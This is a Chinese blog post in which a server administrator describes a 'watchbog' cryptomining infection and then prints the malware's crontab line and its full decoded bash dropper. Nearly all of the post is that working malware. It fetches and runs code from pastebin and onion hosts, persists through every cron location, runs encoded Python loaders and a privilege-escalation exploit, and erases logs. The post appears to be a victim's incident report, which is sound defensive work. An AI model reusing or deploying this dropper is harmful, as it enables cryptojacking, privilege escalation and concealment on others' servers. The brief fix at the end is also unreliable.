版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/zhangvalue/article/details/87928551
之前正常使用了一台阿里云服务器,这几天一直自动挂掉
查看了最近一天的cpu都是接近100%爆表了,今天早上top了一下发现了,主要占据的是watchbog,占用了cpu的99.0%,
挖矿木马.进程名为watchbog
后来查看了一下发现这个木马修改了机器里所有的cron表达式,只要有执行定时任务的服务就会触发脚本并下载挖矿木马
crontab -l列出当前用户的定时任务
[root@spark ~]# crontab -l
*/9 * * * * (curl -fsSL https://pastebin.com/raw/AgdgACUD||wget -q -O- https://pastebin.com/raw/AgdgACUD||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvwxG8").read()'||curl -fsSL https://gitee.com/return_block/party_1/raw/master/main/api/README.md||wget -q -O - https://gitee.com/return_block/party_1/raw/master/main/api/README.md||curl -fsSL https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt)|bash
##
打开这个URL,发现像是一堆base64的密文,密文地址,使用base64解密出来是这个样的
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#This is the TnF job copy
function system() {
rm -rf /bin/httpntp
grep -v "/bin/httpntp" /etc/crontab > /etc/crontab.bak && mv /etc/crontab.bak /etc/crontab
if [ ! -f "/bin/httpntp" ]; then
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /bin/httpntp && chmod 755 /bin/httpntp
if [ ! -f "/bin/httpntp" ]; then
wget https://pastebin.com/raw/3XEzey2T -O /bin/httpntp && chmod 755 /bin/httpntp
fi
if [ ! -f "/etc/crontab" ]; then
echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
else
echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
fi
fi
}
function dragon() {
nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKI3NpbXBsZSBodHRwX2JvdAppbXBvcnQgdXJsbGliCmltcG9ydCBiYXNlNjQKaW1wb3J0IG9zCgpkZWYgc29zKCk6CiAgICB1cmwgPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzA1cDBmVFlkJwogICAgdHJ5OgogICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3Blbih1cmwpLnJlYWQoKSkKICAgICAgICBmID0gb3MucG9wZW4oc3RyKHBhZ2UpKQogICAgZXhjZXB0OgogICAgICAgIHByaW50KCdmYWlsZWQgdG8gZXhlY3V0ZSBvcyBjb21tYW5kJykKICAgICAgICBwYXNzCgpkZWYgcnVuU2NyaXB0KCk6CiAgICB1cmwgPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0t4V1BGZUVuJwogICAgdHJ5OgogICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3Blbih1cmwpLnJlYWQoKSkKICAgICAgICBleGVjKHBhZ2UpCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoJ2ZhaWxlZCB0byBleGVjdXRlIG9zIHB5dGhvbiBzY3JpcHQnKQogICAgICAgIHBhc3MKCmQ9ICdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvWDZ3dnV2OTgnCnRyeToKICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3BlbihkKS5yZWFkKCkpCiAgICBpZiBwYWdlID09ICdvcyc6CiAgICAgICAgc29zKCkKICAgIGVsaWYgcGFnZSA9PSAnc2NyaXB0JzoKICAgICAgICBydW5TY3JpcHQoKQogICAgZWxzZToKICAgICAgICBwcmludCgnSSBjYW5cJ3QgdW5kZXJzdGFuZCB0aGUgYWN0aW9uIGFtIGdpdmVuJykKZXhjZXB0OgogICAgcHJpbnQoJ1NvcnJ5IGJvc3MgSSBjYW5cJ3QgZ2V0IGluc3RydWN0aW9ucycpCiAgICBwYXNzCg=='))" >/dev/null 2>&1 &
touch /tmp/.tmpza
}
function cronhigh() {
chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
rm -rf /etc/cron.hourly/Anacron /etc/cron.daily/Anacron /etc/cron.monthly/Anacron
echo -e "*/3 * * * * root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/root
echo -e "*/5 * * * * root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/system
echo -e "*/7 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/9 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron
if [ ! -f "/etc/cron.hourly/Anacron" ]; then
wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron
fi
mkdir -p /etc/cron.daily
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron
if [ ! -f "/etc/cron.daily/Anacron" ]; then
wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron
fi
mkdir -p /etc/cron.monthly
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron
if [ ! -f "/etc/cron.monthly/Anacron" ]; then
wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron
fi
touch -acmr /bin/sh /var/spool/cron/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
touch -acmr /bin/sh /etc/cron.d/system
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /etc/cron.hourly/Anacron
touch -acmr /bin/sh /etc/cron.daily/Anacron
touch -acmr /bin/sh /etc/cron.monthly/Anacron
}
function cronlow() {
cr=$(crontab -l | grep -q "https://pastebin.com/raw/3XEzey2T" | wc -l)
if [ ${cr} -eq 0 ];then
echo "Cron dosen't exists"
crontab -r
(crontab -l 2>/dev/null; echo "*/1 * * * * (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash > /dev/null 2>&1")| crontab -
else
echo "Cron exists"
fi
}
function downloadlow() {
pa=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pa} -eq 0 ];then
mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/*
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json" ]; then
curl -fsSL https://ptpb.pw/WpNh | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json" ]; then
wget https://ptpb.pw/WpNh -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json
fi
fi
ARCH=$(uname -m)
if [ "$ARCH" == "x86_64" ]; then
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
curl -fsSL https://ptpb.pw/D8r9 -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
wget https://ptpb.pw/D8r9 -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
elif [ "$ARCH" == "i686" ]; then
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
wget https://pixeldra.in/api/download/nZ2s4L -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
wget https://pixeldra.in/api/download/nZ2s4L -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
fi
fi
}
function downloadhigh() {
pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pb} -eq 0 ];then
rm -rf /bin/config.json /bin/watchbog
if [ ! -f "/bin/config.json" ]; then
curl -fsSL https://ptpb.pw/WpNh | base64 -d > /bin/config.json && chmod 777 /bin/config.json
if [ ! -f "/bin/config.json" ]; then
wget https://ptpb.pw/WpNh -O - | base64 -d > /bin/config.json && chmod 777 /bin/config.json
fi
fi
ARCH=$(uname -m)
if [ "$ARCH" == "x86_64" ]; then
if [ ! -f "/bin/watchbog" ]; then
curl -fsSL https://ptpb.pw/D8r9 -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f "/bin/watchbog" ]; then
wget https://ptpb.pw/D8r9 -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
elif [ "$ARCH" == "i686" ]; then
if [ ! -f "/bin/watchbog" ]; then
curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f "/bin/watchbog" ]; then
wget https://pixeldra.in/api/download/nZ2s4L -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
if [ ! -f "/bin/watchbog" ]; then
curl -fsSL https://pixeldra.in/api/download/nZ2s4L -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f "/bin/watchbog" ]; then
wget https://pixeldra.in/api/download/nZ2s4L -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
fi
fi
}
function testhigh() {
pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pb} -eq 0 ];then
rm -rf /bin/watchbog /bin/config.json
if [ ! -f "/bin/config.txt" ]; then
curl -fsSL https://ptpb.pw/KAlo | base64 -d > /bin/config.txt && chmod 777 /bin/config.txt
if [ ! -f "/bin/config.txt" ]; then
wget https://ptpb.pw/KAlo -O - | base64 -d > /bin/config.txt && chmod 777 /bin/config.txt
fi
fi
if [ ! -f "/bin/cpu.txt" ]; then
curl -fsSL https://ptpb.pw/Nqo- | base64 -d > /bin/cpu.txt && chmod 777 /bin/cpu.txt
if [ ! -f "/bin/cpu.txt" ]; then
wget https://ptpb.pw/Nqo- -O - | base64 -d > /bin/cpu.txt && chmod 777 /bin/cpu.txt
fi
fi
if [ ! -f "/bin/pools.txt" ]; then
curl -fsSL https://ptpb.pw/9Lyg | base64 -d > /bin/pools.txt && chmod 777 /bin/pools.txt
if [ ! -f "/bin/pools.txt" ]; then
wget https://ptpb.pw/9Lyg -O - | base64 -d > /bin/pools.txt && chmod 777 /bin/pools.txt
fi
fi
ARCH=$(uname -m)
if [ "$ARCH" == "x86_64" ]; then
if [ ! -f "/bin/watchbog" ]; then
curl -fsSL https://ptpb.pw/mNJt -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f "/bin/watchbog" ]; then
wget https://ptpb.pw/mNJt -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
rm -rf /bin/cpu.txt /bin/pools.txt /bin/config.txt
fi
fi
}
function testlow() {
pb=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pb} -eq 0 ];then
mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/*
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt" ]; then
curl -fsSL https://ptpb.pw/KAlo | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt" ]; then
wget https://ptpb.pw/KAlo -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
fi
fi
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt" ]; then
curl -fsSL https://ptpb.pw/Nqo- | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt" ]; then
wget https://ptpb.pw/Nqo- -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt
fi
fi
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt" ]; then
curl -fsSL https://ptpb.pw/9Lyg | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt" ]; then
wget https://ptpb.pw/9Lyg -O - | base64 -d > /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt
fi
fi
ARCH=$(uname -m)
if [ "$ARCH" == "x86_64" ]; then
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
curl -fsSL https://ptpb.pw/mNJt -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f "/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog" ]; then
wget https://ptpb.pw/mNJt -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
fi
fi
}
function successhigh() {
(curl -fsSL https://pastebin.com/raw/eCZwXCiK || wget -q -O - https://pastebin.com/raw/eCZwXCiK)
touch /tmp/.tmpc
}
function successlow() {
(curl -fsSL https://pastebin.com/raw/fMXdbHRs || wget -q -O - https://pastebin.com/raw/fMXdbHRs)
touch /tmp/.tmpc
}
function elevate() {
ARCH=$(uname -m)
if [ "$ARCH" == "x86_64" ]; then
echo "The Arch Is Supported lets GO On"
python -V >/dev/null 2>&1
if [ "$?" = "0" ]; then
echo "Python Is Avalaible lets GO On"
python -c "import base64;exec(base64.b64decode('aW1wb3J0IGhhc2hsaWIKaW1wb3J0IG9zCmltcG9ydCBvcy5wYXRoCmltcG9ydCB0aW1lCgpqb2tlX2RpYyA9IFsKICAgICc0LjQuMC0zMS1nZW5lcmljJywKICAgICc0LjQuMC02Mi1nZW5lcmljJywKICAgICc0LjQuMC04MS1nZW5lcmljJywKICAgICc0LjQuMC0xMTYtZ2VuZXJpYycsCiAgICAnNC44LjAtNTgtZ2VuZXJpYycsCiAgICAnNC4xMC4wLjQyLWdlbmVyaWMnLAogICAgJzQuMTMuMC0yMS1nZW5lcmljJywKICAgICc0LjkuMC0zLWFtZDY0JywKICAgICc0LjkuMC1kZWVwaW4xMy1hbWQ2NCcsCiAgICAnNC44LjAtNTItZ2VuZXJpYycsCiAgICAnNC44LjYtMzAwLmZjMjUueDg2XzY0JywKICAgICc0LjExLjgtMzAwLmZjMjYueDg2XzY0JywKICAgICc0LjEzLjktMzAwLmZjMjcueDg2XzY0JywKICAgICc0LjUuMi1hdWZzLXInLAogICAgJzQuNC4wLTg5LWdlbmVyaWMnLAogICAgJzQuOC4wLTU4LWdlbmVyaWMnLAogICAgJzQuMTMuMC0xNi1nZW5lcmljJywKICAgICc0LjkuMzUtZGVza3RvcC0xLm1nYTYnLAogICAgJzQuNC4yOC0yLU1BTkpBUk8nLAogICAgJzQuMTIuNy0xMS5jdXJyZW50JywKICAgICc0LjQuMC04OS1nZW5lcmljJywKICAgICc0LjguMC00NS1nZW5lcmljJywKICAgICc0LjEwLjAtMjgtZ2VuZXJpYycsCiAgICAnNC4xMC4wLTE5LWdlbmVyaWMnLAogICAgJzQuOC4wLTM5LWdlbmVyaWMnXQoKbXlfa2VybmVsX3ZlciA9IG9zLnBvcGVuKCd1bmFtZSAtcicpLnJlYWQoKS5zdHJpcCgpICMKCmNvbSA9ICcnJ25vaHVwIGJhc2ggLWMgJyhjdXJsIC1mc1NMIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy8zWEV6ZXkyVHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzNYRXpleTJUKXxiYXNoJyA+L2Rldi9udWxsIDI+JjEgJgpybSAtcmYgL3RtcC9hY3RpdmF0ZScnJwoKZGVmIG1kNUNoZWNrc3VtKGZpbGVQYXRoKToKICAgIHdpdGggb3BlbihmaWxlUGF0aCwgJ3JiJykgYXMgZmg6CiAgICAgICAgbSA9IGhhc2hsaWIubWQ1KCkKICAgICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICBkYXRhID0gZmgucmVhZCg4MTkyKQogICAgICAgICAgICBpZiBub3QgZGF0YToKICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgIG0udXBkYXRlKGRhdGEpCiAgICAgICAgcmV0dXJuIG0uaGV4ZGlnZXN0KCkKCmRlZiBtYWluKCk6CiAgICBHb0pva2UgPSBteV9rZXJuZWxfdmVyIGluIGpva2VfZGljCiAgICBmID0gb3BlbignL3RtcC9hY3RpdmF0ZScsICd3JykKICAgIGYud3JpdGUoY29tKQogICAgZi5jbG9zZSgpICAgIAogICAgaWYgR29Kb2tlOgogICAgICAgIGlmIG9zLnBhdGguZXhpc3RzKCcvdXNyL2Jpbi93Z2V0JykgYW5kIG9zLnBhdGguaXNmaWxlKCcvdXNyL2Jpbi93Z2V0Jyk6CiAgICAgICAgICAgIG9zLnN5c3RlbSgnd2dldCBodHRwczovL3BpeGVsZHJhLmluL2FwaS9kb3dubG9hZC84aUZFRWcgLU8gL3RtcC9lbGF2YXRlICYmIGNobW9kIDc3NyAvdG1wL2VsYXZhdGUgJiYgY2htb2QgK3ggL3RtcC9lbGF2YXRlJykKICAgICAgICBlbGlmIG9zLnBhdGguZXhpc3RzKCcvdXNyL2Jpbi9jdXJsJykgYW5kIG9zLnBhdGguaXNmaWxlKCcvdXNyL2Jpbi9jdXJsJyk6CiAgICAgICAgICAgIG9zLnN5c3RlbSgnY3VybCBodHRwczovL3BpeGVsZHJhLmluL2FwaS9kb3dubG9hZC84aUZFRWcgLW8gL3RtcC9lbGF2YXRlICYmIGNobW9kIDc3NyAvdG1wL2VsYXZhdGUgJiYgY2htb2QgK3ggL3RtcC9lbGF2YXRlJykKICAgICAgICBlbHNlOgogICAgICAgICAgICByZXR1cm4KICAgICAgICBpZiBvcy5wYXRoLmV4aXN0cygnL3RtcC9lbGF2YXRlJykgYW5kIG9zLnBhdGguaXNmaWxlKCcvdG1wL2VsYXZhdGUnKToKICAgICAgICAgICAgaWYgbWQ1Q2hlY2tzdW0oJy90bXAvZWxhdmF0ZScpPT0nMTU3NDk1ZjZiYThjMzZjMzg5ODRkMWY5MDJjZjNhYzAnOgogICAgICAgICAgICAgICAgb3Muc3lzdGVtKCdjZCAvdG1wLyAmJiAuL2VsYXZhdGUgPCBhY3RpdmF0ZScpCiAgICAgICAgICAgICAgICB0aW1lLnNsZWVwKDEwKQogICAgZWxzZToKICAgICAgICByZXR1cm4KCm1haW4oKQo='))" >/dev/null 2>&1
else
cronlow
downloadlow
fi
sleep 30
if [ ! -f "/tmp/activate" ]; then
echo "I guess The Exploit worked"
pmp=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pmp} -ne 0 ];then
pup=$(ps auxf | grep 'watchbog' | grep -v grep | awk '{print $1}')
if [ "$pup" == "root" ];then
echo "The Exploit worked Successfully"
echo "Hahahahha"
rm -rf /tmp/elevate
cronlow
exit 0
else
cronlow
downloadlow
fi
else
cronlow
downloadlow
fi
else
rm -rf /tmp/elevate
rm -rf /tmp/activate
cronlow
downloadlow
fi
else
cronlow
downloadlow
fi
}
update=$( (curl -fsSL --max-time 120 https://pastebin.com/raw/2unJiD3b) )
if [ "$update" == "update"x ];then
echo "An update exists boss"
rm -rf /tmp/.tmpza
if [ ! -f "/tmp/.tmpold" ]; then
spreada
fi
else
echo "NO update exists boss"
fi
BS=$( whoami )
echo "I am $BS"
if [ ! -f "/tmp/.tmpnewasss" ]; then
touch /tmp/.tmpnewasss
rm /tmp/.tmpnewzz
ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
pkill -f watchbog
fi
if [ "$BS" != "root" ];then
if [ ! -f "/tmp/.tmpleve" ]; then
crontab -r
ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
pkill -f watchbog
fi
ps -fe|grep 'watchbog'|grep -v grep|wc -l
if [ $? -ne 0 ];then
echo "It's running boss"
crontab -r
cronlow
else
if [ ! -f "/tmp/.tmpleve" ]; then
rm -rf /tmp/.tmpelev
touch /tmp/.tmpleve
elevate
else
downloadlow
fi
cronlow
sleep 15
if [ ${pm} -eq 0 ];then
testlow
fi
pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pm} -ne 0 ];then
if [ ! -f "/tmp/.tmpc" ]; then
successlow
fi
fi
fi
fi
if [ "$BS" == "root" ];then
ps -fe|grep 'watchbog'|grep -v grep|wc -l
if [ $? -ne 0 ];then
echo "It's running boss"
system
cronhigh
downloadhigh
else
system
cronhigh
downloadhigh
sleep 15
pm=$(ps -fe|grep 'watchbog'|grep -v grep|wc -l)
if [ ${pm} -ne 0 ];then
if [ ! -f "/tmp/.tmpc" ]; then
successhigh
fi
fi
sleep 30
if [ ${pm} -eq 0 ];then
testhigh
if [ ${pm} -ne 0 ];then
successhigh
fi
fi
if [ ${pm} -eq 0 ];then
downloadlow
if [ ${pm} -ne 0 ];then
successlow
fi
fi
if [ ${pm} -eq 0 ];then
testlow
if [ ${pm} -ne 0 ];then
successlow
fi
fi
fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
sed -i '/pastebin/d' /var/log/syslog
sed -i '/github/d' /var/log/syslog
echo 0>/var/spool/mail/root
fi
#
最终的解决办法是
kill进程,删除病毒文件,就可控了,只不过crontab功能废掉了
关闭crontab
systemctl stop crond
killall watchbog
